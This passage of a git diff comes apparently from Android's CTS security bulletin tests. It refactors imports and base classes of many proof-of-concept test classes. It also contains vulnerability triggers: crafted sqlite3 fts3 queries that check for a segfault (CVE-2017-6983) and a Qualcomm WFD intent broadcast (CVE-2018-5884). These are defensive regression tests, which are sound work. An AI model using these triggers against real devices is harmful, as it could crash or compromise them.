-import com.android.ddmlib.Log;
-
-import com.google.common.collect.ImmutableSet;
-
-import java.util.Set;
-import java.util.regex.Matcher;
-import java.util.regex.Pattern;
-
-public class HostsideMainlineModuleDetector {
- private static final String LOG_TAG = "MainlineModuleDetector";
-
- private SecurityTestCase context;
-
- private static ImmutableSet<String> playManagedModules;
-
- HostsideMainlineModuleDetector(SecurityTestCase context) {
- this.context = context;
- }
-
- synchronized Set<String> getPlayManagedModules() throws Exception {
- if (playManagedModules == null) {
- AdbUtils.runCommandLine("logcat -c", context.getDevice());
- String output = AdbUtils.runCommandLine(
- "am start com.android.cts.mainlinemoduledetector/.MainlineModuleDetector",
- context.getDevice());
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "am output: " + output);
- Thread.sleep(5 * 1000L);
- String logcat = AdbUtils.runCommandLine("logcat -d -s MainlineModuleDetector:I",
- context.getDevice());
- Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG,
- "Found logcat output: " + logcat);
- Matcher matcher = Pattern.compile("Play managed modules are: <(.*?)>").matcher(logcat);
- if (matcher.find()) {
- playManagedModules = ImmutableSet.copyOf(matcher.group(1).split(","));
- } else {
- playManagedModules = ImmutableSet.of();
- }
- }
- return playManagedModules;
- }
-}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
index 367c766f750..2a0a572acc2 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_04.java
@@ -15,15 +15,18 @@
*/
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_04 extends SecurityTestCase {
+public class Poc16_04 extends NonRootSecurityTestCase {
/**
* b/26323455
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
index f185352d60c..a837d5b0a5f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_05.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_05 extends SecurityTestCase {
+public class Poc16_05 extends NonRootSecurityTestCase {
/**
* b/27555981
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java
index 6f7d26bde86..d4519ba3f84 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_06.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_06 extends SecurityTestCase {
+public class Poc16_06 extends NonRootSecurityTestCase {
/**
* b/27661749
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
index d5982522bb4..ae91d11e6d9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_07.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_07 extends SecurityTestCase {
+public class Poc16_07 extends NonRootSecurityTestCase {
/**
* b/28740702
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
index e3f9906a2ca..69821c88987 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_09.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_09 extends SecurityTestCase {
+public class Poc16_09 extends NonRootSecurityTestCase {
/**
* b/27773913
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
index c19333af12c..beec744e4ea 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_10.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_10 extends SecurityTestCase {
+public class Poc16_10 extends NonRootSecurityTestCase {
/**
* b/30204103
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
index 5012920c3de..e1334b59dc8 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_11.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_11 extends SecurityTestCase {
+public class Poc16_11 extends NonRootSecurityTestCase {
/**
* b/29149404
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
index 392b11a1c4a..96570645487 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc16_12.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc16_12 extends SecurityTestCase {
+public class Poc16_12 extends NonRootSecurityTestCase {
//Criticals
/**
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
index 07737163131..71e6998c4e2 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_01.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_01 extends SecurityTestCase {
+public class Poc17_01 extends NonRootSecurityTestCase {
//Criticals
/**
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
index 1fd4bf95d68..cd3dab04536 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_02.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_02 extends SecurityTestCase {
+public class Poc17_02 extends NonRootSecurityTestCase {
/**
* b/32799236
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
index 50093b81a96..fba71464cc9 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_03.java
@@ -16,17 +16,20 @@
package android.security.cts;
-import java.util.concurrent.Callable;
+import static org.junit.Assert.*;
import android.platform.test.annotations.AsbSecurityTest;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+
import org.junit.Test;
import org.junit.runner.RunWith;
-import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import java.util.concurrent.Callable;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_03 extends SecurityTestCase {
+public class Poc17_03 extends NonRootSecurityTestCase {
/**
* b/31824853
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
index 36f921c81b0..478398b864a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_04.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_04 extends SecurityTestCase {
+public class Poc17_04 extends NonRootSecurityTestCase {
/**
* b/32342065
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
index fcedfb95a89..11a31233b0e 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_05.java
@@ -16,18 +16,18 @@
package android.security.cts;
-import java.util.Arrays;
-import java.util.concurrent.Callable;
+import static org.junit.Assert.*;
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_05 extends SecurityTestCase {
+public class Poc17_05 extends NonRootSecurityTestCase {
/*
* CVE-2016-5862
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
index a3609a2418d..9afeb9bdb76 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_06.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_06 extends SecurityTestCase {
+public class Poc17_06 extends NonRootSecurityTestCase {
/**
* b/36392138
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
index f9309e5b93c..52b40a6d08a 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_07.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_07 extends SecurityTestCase {
+public class Poc17_07 extends NonRootSecurityTestCase {
/**
* b/35443725
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
index dbb50bd19b7..fdbc11f37fe 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_09.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_09 extends SecurityTestCase {
+public class Poc17_09 extends NonRootSecurityTestCase {
/**
* b/63852675
@@ -32,31 +35,39 @@ public class Poc17_09 extends SecurityTestCase {
@Test
@AsbSecurityTest(cveBugId = 63852675)
public void testPocCve_2017_6983() throws Exception {
- // Error code of 139 represents segmentation fault
- assertFalse("Segfault found",
- AdbUtils.runCommandGetExitCode("sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
- + "INSERT INTO a values(x'efbeaddeefbeadde');"
- + "SELECT optimize(b) FROM a;\""
- , getDevice()
- )==139);
- assertFalse("Segfault found",
- AdbUtils.runCommandGetExitCode("sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
- + "INSERT INTO a values(x'efbeaddeefbeadde');"
- + "SELECT snippet(b) FROM a;\""
- , getDevice()
- )==139);
- assertFalse("Segfault found",
- AdbUtils.runCommandGetExitCode("sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
- + "INSERT INTO a values(x'efbeaddeefbeadde');"
- + "SELECT offsets(b) FROM a;\""
- , getDevice()
- )==139);
- assertFalse("Segfault found",
- AdbUtils.runCommandGetExitCode("sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
- + "INSERT INTO a values(x'efbeaddeefbeadde');"
- + "SELECT matchinfo(b) FROM a;\""
- , getDevice()
- )==139);
+ // Error code of 139 represents segmentation fault
+ assertFalse(
+ "Segfault found",
+ AdbUtils.runCommandGetExitCode(
+ "sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
+ + "INSERT INTO a values(x'efbeaddeefbeadde');"
+ + "SELECT optimize(b) FROM a;\"",
+ getDevice())
+ == 139);
+ assertFalse(
+ "Segfault found",
+ AdbUtils.runCommandGetExitCode(
+ "sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
+ + "INSERT INTO a values(x'efbeaddeefbeadde');"
+ + "SELECT snippet(b) FROM a;\"",
+ getDevice())
+ == 139);
+ assertFalse(
+ "Segfault found",
+ AdbUtils.runCommandGetExitCode(
+ "sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
+ + "INSERT INTO a values(x'efbeaddeefbeadde');"
+ + "SELECT offsets(b) FROM a;\"",
+ getDevice())
+ == 139);
+ assertFalse(
+ "Segfault found",
+ AdbUtils.runCommandGetExitCode(
+ "sqlite3 ':memory:' \"CREATE VIRTUAL TABLE a using fts3(b);"
+ + "INSERT INTO a values(x'efbeaddeefbeadde');"
+ + "SELECT matchinfo(b) FROM a;\"",
+ getDevice())
+ == 139);
}
/**
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
index 168656111e4..4d406b7ce29 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_11.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_11 extends SecurityTestCase {
+public class Poc17_11 extends NonRootSecurityTestCase {
/**
* b/36075131
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
index 160ec27d4a4..f63f34ff507 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc17_12.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc17_12 extends SecurityTestCase {
+public class Poc17_12 extends NonRootSecurityTestCase {
/**
* b/38045794
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
index 1730fefecd2..b27efff8fd5 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_02 extends SecurityTestCase {
+public class Poc18_02 extends NonRootSecurityTestCase {
/**
* b/68953950
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
index 0899f282005..f7a9519071d 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_03 extends SecurityTestCase {
+public class Poc18_03 extends NonRootSecurityTestCase {
/**
* b/71389378
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
index 17ada80a888..7a4fd549db4 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_04 extends SecurityTestCase {
+public class Poc18_04 extends NonRootSecurityTestCase {
/**
* b/69683251
* Does not require root but must be a hostside test to avoid
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
index 320f9970ee1..9b1830d9d6f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_05 extends SecurityTestCase {
+public class Poc18_05 extends NonRootSecurityTestCase {
/**
* b/70721937
* Does not require root but must be a hostside test to avoid a race
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_06.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_06.java
index 63cdf56707a..236865e89b5 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_06.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_06.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_06 extends SecurityTestCase {
+public class Poc18_06 extends NonRootSecurityTestCase {
/**
* CVE-2018-5884
@@ -35,9 +38,11 @@ public class Poc18_06 extends SecurityTestCase {
String wfd_service = AdbUtils.runCommandLine(
"pm list package com.qualcomm.wfd.service", getDevice());
if (wfd_service.contains("com.qualcomm.wfd.service")) {
- String result = AdbUtils.runCommandLine(
- "am broadcast -a qualcomm.intent.action.WIFI_DISPLAY_BITRATE --ei format 3 --ei value 32",
- getDevice());
+ String result =
+ AdbUtils.runCommandLine(
+ "am broadcast -a qualcomm.intent.action.WIFI_DISPLAY_BITRATE --ei"
+ + " format 3 --ei value 32",
+ getDevice());
assertNotMatchesMultiLine("Broadcast completed", result);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
index 11476586982..ce3ee4d445f 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_07 extends SecurityTestCase {
+public class Poc18_07 extends NonRootSecurityTestCase {
/**
* b/76221123
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
index a8b90508973..3e0cc2da5d8 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_10 extends SecurityTestCase {
+public class Poc18_10 extends NonRootSecurityTestCase {
/**
* b/111641492
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
index e6ca50b8869..8f00629f3cf 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc18_11 extends SecurityTestCase {
+public class Poc18_11 extends NonRootSecurityTestCase {
/**
* b/113027383
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java
index 1e56873f4b1..dab20669def 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc19_03 extends SecurityTestCase {
+public class Poc19_03 extends NonRootSecurityTestCase {
/**
* b/115739809
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java
index a22fc97d425..f9f8b7cb689 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_05.java
@@ -16,15 +16,18 @@
package android.security.cts;
+import static org.junit.Assert.*;
+
import android.platform.test.annotations.AsbSecurityTest;
-import org.junit.Test;
-import org.junit.runner.RunWith;
+
+import com.android.sts.common.tradefed.testtype.NonRootSecurityTestCase;
import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
-import static org.junit.Assert.*;
+import org.junit.Test;
+import org.junit.runner.RunWith;
@RunWith(DeviceJUnit4ClassRunner.class)
-public class Poc19_05 extends SecurityTestCase {
+public class Poc19_05 extends NonRootSecurityTestCase {
/**
* CVE-2019-2257
*/
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_07.java
